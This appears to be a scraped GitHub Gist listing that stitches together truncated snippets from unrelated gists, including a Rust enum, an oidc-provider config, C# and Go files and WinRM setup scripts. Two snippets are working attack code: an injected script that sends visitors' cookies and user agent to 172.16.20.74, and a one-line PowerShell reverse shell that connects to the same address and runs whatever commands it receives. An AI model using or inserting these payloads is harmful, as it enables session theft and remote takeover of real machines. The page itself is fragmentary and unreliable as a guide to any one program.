This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#[derive(Debug)] | |
enum MemoryItem<'a>{ | |
Int32(i32), | |
Int64(i64), | |
Float32(f32), | |
Float64(f64), | |
Boolean(bool), | |
String(&'a str) | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name | 2019-04-09T17:06:33.0000000Z | 2019-04-09T17:06:33.0000000Z | 2019-04-09T17:06:33.0000000Z | 2019-04-09T17:06:35.0000000Z | 2019-04-09T17:06:37.0000000Z | 2019-04-09T17:06:37.0000000Z | 2019-04-09T17:06:37.0000000Z | 2019-04-09T17:06:37.0000000Z | 2019-04-09T17:06:37.0000000Z | 2019-04-09T17:06:37.0000000Z | 2019-04-09T17:06:37.0000000Z | 2019-04-09T17:06:39.0000000Z | 2019-04-09T17:06:39.0000000Z | 2019-04-09T17:06:40.0000000Z | 2019-04-09T17:06:40.0000000Z | 2019-04-09T17:06:40.0000000Z | 2019-04-09T17:06:40.0000000Z | 2019-04-09T17:06:40.0000000Z | 2019-04-09T17:06:40.0000000Z | 2019-04-09T17:06:40.0000000Z | 2019-04-09T17:06:40.0000000Z | 2019-04-09T17:06:40.0000000Z | 2019-04-09T17:06:40.0000000Z | 2019-04-09T17:07:32.0000000Z | 2019-04-09T17:07:32.0000000Z | 2019-04-09T17:07:32.0000000Z | 2019-04-09T17:07:33.0000000Z | 2019-04-09T17:07:57.0000000Z | 2019-04-09T17:07:57.0000000Z | 2019-04-09T17:07:57.0000000Z | 2019-04-09T17:07:57.0000000Z | 2019-04-09T17:07:57.0000000Z | 2019-04-09T17:07:57.0000000Z | 2019-04-09T17:08:11.0000000Z | 2019-04-09T17:08:11.0000000Z | 2019 |
---|
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const Provider = require('oidc-provider'); | |
const configuration = { | |
features: { | |
discovery: true, | |
registration: { initialAccessToken: true }, | |
}, | |
format: { default: 'opaque' }, | |
}; | |
const clients = [{ | |
client_id: 'foo', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
if (document.cookie.length > 0) { | |
$("body").prepend('<img src="http://172.16.20.74:5916/' + window.navigator.userAgent + ' ' + document.cookie + '"/>'); | |
} | |
</script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$sm=(New-Object Net.Sockets.TCPClient("172.16.20.74",4445)).GetStream();[byte[]]$bt=0..255|%{0};$sm.Write(([text.encoding]::ASCII).GetBytes("CONNECTED"),0,9);$sm.Write(10,0,1);while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length);$sm.Write(10,0,1);} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Linq; | |
public class Program | |
{ | |
public interface Interface | |
{ | |
string Name { get; } | |
void Method(); | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"version": "0.2.0", | |
"configurations": [ | |
{ | |
"name": "Launch", | |
"type": "go", | |
"request": "launch", | |
"mode": "debug", | |
"remotePath": "", | |
"port": 2345, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
################################################################################################################################# | |
# Name : Configure-WinRM.ps1 # | |
# # | |
# Description : Configures the WinRM on a local machine # | |
# # | |
# Arguments : HostName, specifies the FQDN of machine or domain # | |
################################################################################################################################# | |
param | |
( |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Data.SQLite; | |
using System.Threading; | |
using System.Threading.Tasks; | |
namespace sqlite_trace_callback_delegate | |
{ | |
public static class ExplicitDelegates | |
{ | |
// Explicitly instantiated + static to avoid GC |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
... | |
# Template for the settings of enabling WinRM on the machine | |
data "template_file" "winrm_arm_settings" { | |
template = "${file("../../Shared/winrm-arm-settings.template.json")}" | |
vars { | |
dns_name = "${azurerm_public_ip.primary.fqdn}" | |
} | |
} |
NewerOlder